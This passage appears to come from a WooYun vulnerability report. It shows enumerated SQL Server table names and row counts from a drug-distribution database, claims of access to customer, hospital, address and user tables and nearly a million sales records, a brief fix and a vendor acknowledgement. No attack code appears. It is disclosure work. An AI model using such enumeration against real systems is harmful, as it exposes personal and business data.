| dbo.ERPGOODS_INF            | 180     |
| dbo.THAlarmData_Info103     | 172     |
| dbo.MAC_Info                | 155     |
| dbo.THDataOld_Info72        | 152     |
| dbo.SupervisionCode_NewInfo | 146     |
| dbo.StoreDrugs_Info20130703 | 144     |
| dbo.Department_Info         | 139     |
| dbo.THAlarmData_Info136     | 135     |
| dbo.THAlarmData_Info72      | 118     |
| dbo.SHM_NSD                 | 102     |
| dbo.Equip_Info              | 97      |
| dbo.StoreDrugs_Info20130729 | 92      |
| dbo.njy_DDYY                | 90      |
| dbo.SHM_CY                  | 87      |
| dbo.Field_Info              | 86      |
| dbo.THDataOld_Info118       | 82      |
| dbo.Enter_Info              | 80      |
| dbo.Order_Head_Info_DEL_BAK | 76      |
| dbo.THAlarmData_Info79      | 75      |
| dbo.THDataOld_Info79        | 75      |
| dbo.THDataOld_Info99        | 69      |
| dbo.THAlarmData_Info99      | 64      |
| dbo.THAlarmData_Info100     | 61      |
| dbo.OD_Special              | 49      |
| dbo.shm                     | 49      |
| dbo.ValidateNode_Info       | 49      |
| dbo.THAlarmData_Info60      | 47      |
| dbo.THDataOld_Info60        | 47      |
| dbo.THAlarmData_Info118     | 46      |
| dbo.StuffType_Info          | 43      |
| dbo.SHM_RGYY                | 42      |
| dbo.EquipValidate_Info      | 36      |
| dbo.StorageRoom_Info        | 33      |
| dbo.ProductType_Info        | 30      |
| dbo.EquipNavigationNow_Info | 26      |
| dbo.Order_List_Info_DEL_BAK | 23      |
| dbo.Role_Info               | 23      |
| dbo.THDataOld_Info48        | 22      |
| dbo.DTPCommissioner_Info    | 21      |
| dbo.aaaaa                   | 18      |
| dbo.SMSAccount_Info         | 14      |
| dbo.THAlarmData_Info48      | 14      |
| dbo.Scope_Info              | 13      |
| dbo.Sequence                | 12      |
| dbo.SaleRecord_Info_DELBAK  | 9       |
| dbo.Customer_Info_DELBAK    | 8       |
| dbo.UserDrugs_Info          | 6       |
| dbo.THAlarmData_Info57      | 4       |
| dbo.THDataOld_Info57        | 4       |
| dbo.UserPage_Info           | 4       |
| dbo.Page_Info               | 3       |
| dbo.Canal_Info              | 1       |
| dbo.EquipValidate_Head_Info | 1       |
| dbo.Supplier_Info           | 1       |
+-----------------------------+---------+


漏洞证明:

选择其中的几个信息表:
d_batsale 968490条信息,只看了2个字段

QQ图片20150826182342.png


Customer_Info 客户信息表
Hospital_Info 医院信息表 576条
Address_Info地址表 385条
User_Info 用户表 192条

修复方案:

权限控制,过滤;

版权声明:转载请注明来源 Ysql404@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-01 23:22

厂商回复:

感谢提交

最新状态:

暂无